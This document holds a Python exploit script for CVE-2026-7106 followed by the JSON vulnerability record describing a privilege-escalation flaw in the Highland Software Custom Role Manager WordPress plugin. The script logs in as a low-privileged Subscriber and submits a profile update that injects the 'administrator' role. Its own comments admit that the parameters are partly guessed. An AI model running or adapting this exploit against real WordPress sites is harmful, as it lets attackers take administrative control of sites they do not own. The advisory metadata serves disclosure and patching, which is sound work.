CVE-2026-7106

import requests # Exploit Title: WordPress Highland Software Custom Role Manager < 1.0.0 - Privilege Escalation # Date: 2026-04-27 # Exploit Author: Analyst # Vendor Homepage: https://wordpress.org/ # Software Link: https://wordpress.org/plugins/highland-software-custom-role-manager/ # Version: <= 1.0.0 # CVE: CVE-2026-7106 def exploit(target_url, username, password): session = requests.Session() login_url = f"{target_url}/wp-login.php" profile_url = f"{target_url}/wp-admin/profile.php" # Step 1: Authenticate as a low-privileged user (e.g., Subscriber) login_data = { "log": username, "pwd": password, "redirect_to": profile_url, "wp-submit": "Log In", "testcookie": "1" } session.post(login_url, data=login_data) # Step 2: Send payload to update user role via profile update # The vulnerable hook 'personal_options_update' triggers hscrm_save_user_roles() # We inject the desired role (e.g., 'administrator') into the request exploit_data = { "from": "profile", "checkuser_id": "1", # May need to be adjusted "user_id": "2", # The ID of the user being modified (attacker's ID) "action": "update", # The vulnerable plugin likely expects a role parameter here "hscrm_role": "administrator", "submit": "Update Profile" } response = session.post(profile_url, data=exploit_data) if response.status_code == 200: print("[+] Payload sent. Check if user role has been escalated.") else: print("[-] Exploit failed.") if __name__ == "__main__": exploit("http://target-site.com", "subscriber", "password")

{"cve": {"id": "CVE-2026-7106", "sourceIdentifier": "[email protected]", "published": "2026-04-27T03:16:00.297", "lastModified": "2026-04-27T18:38:48.527", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Highland Software Custom Role Manager plugin for WordPress is vulnerable to Privilege Escalation in versions up to and including 1.0.0. This is due to insufficient authorization checks in the hscrm_save_user_roles() function, which is hooked to the personal_options_update action accessible by any authenticated user. This makes it possible for authenticated attackers, with Subscriber-level access or higher, to potentially modify user roles via the profile update form."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/highland-software-custom-role-manager/tags/1.0.0/includes/user-ui.php#L203", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/highland-software-custom-role-manager/tags/1.0.0/includes/user-ui.php#L223", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/highland-software-custom-role-manager/tags/1.0.0/includes/user-ui.php#L289", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/highland-software-custom-role-manager/tags/1.0.1/includes/user-ui.php#L203", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/highland-software-custom-role-manager/trunk/includes/user-ui.php#L203", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/highland-software-custom-role-manager/trunk/includes/user-ui.php#L223", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/highland-software-custom-role-manager/trunk/includes/user-ui.php#L289", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/80a258a6-634c-4d7d-981f-bcbc0bb044f7?source=cve", "source": "[email protected]"}]}}